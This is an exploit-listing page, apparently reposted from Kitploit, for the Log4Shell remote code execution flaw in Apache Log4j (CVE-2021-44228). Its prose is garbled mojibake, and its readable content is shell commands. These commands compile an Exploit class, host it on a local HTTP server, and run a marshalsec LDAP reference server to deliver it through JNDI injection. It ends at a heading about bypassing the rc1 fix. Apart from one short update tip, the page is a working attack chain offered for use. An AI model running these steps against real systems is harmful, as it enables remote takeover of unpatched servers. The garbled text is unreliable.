Sploitus

Exploit for CVE-2021-44228-Apache-Log4j-Rce

kitploit ┬╖ 2026-09-05

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KANNTHU-CVE-2021-44228-APACHE-LOG4J-RCE
# CVE-2021-44228(Apache Log4j рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрдЬреАрдХреНрдпреВрд╢рдия╝Й

> рд╕рднреА log4j-core рд╕рдВрд╕реНрдХрд░рдг >=2.0-beta9 рдФрд░ <=2.14.1

1.x рдХреЗ рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдиреНрдп рдХрдордЬреЛрд░рд┐рдпрд╛рдБ рд╣реИрдВ, рд╣рдо рдЕрдиреБрд╢рдВрд╕рд╛ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдЖрдк рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВред

рд╕реБрд░рдХреНрд╖рд╛ рд╕рд▓рд╛рд╣рдХрд╛рд░ / рдмреБрд▓реЗрдЯрд┐рди Log4Shell (CVE-2021-44228) рд╕реЗ рдЬреБрдбрд╝реЗ

### рдЙрдкрдпреЛрдЧ:

root@kitploit:~
    
    
    git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
    cd apache-log4j-poc/src/main/java
    javac Exploit.java 
    # For Python2
    python -m SimpleHTTPServer 8888 
    # For Python3
    python3 -m http.server 8888
    

root@kitploit:~
    
    
    git clone https://github.com/mbechler/marshalsec.git
    cd marshalsec
    # Java 8 required
    mvn clean package -DskipTests
    cd target
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
    

рдЕрдВрдд рдореЗрдВ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЪрд▓рд╛рдПрдБ, рдЖрдк рдЕрдкрдиреЗ рд╕реНрдерд╛рдиреАрдп рд╕реЗ рдХреИрд▓рдХреБрд▓реЗрдЯрд░ рджреЗрдЦреЗрдВрдЧреЗред

Tips:

> рд╡рд░реНрддрдорд╛рди Java рд╕рдВрд╕реНрдХрд░рдг рдкрд░ рднрд░реЛрд╕рд╛ рди рдХрд░реЗрдВ рдХрд┐ рд╡рд╣ рдЖрдкрдХреЛ рдмрдЪрд╛рдПрдЧрд╛ред Log4j рдХреЛ рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВ (рдпрд╛ JNDI lookup рд╣рдЯрд╛рдПрдБ)ред рд╡рд┐рд╕реНрддрд╛рд░ рдХреЛ рдЕрдХреНрд╖рдо рдХрд░реЗрдВ (рд╡реИрд╕реЗ рднреА рдпрд╣ рдХрд╛рдлреА рдмреБрд░рд╛ рд╡рд┐рдЪрд╛рд░ рд▓рдЧрддрд╛ рд╣реИ)ред

### rc1 рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдВ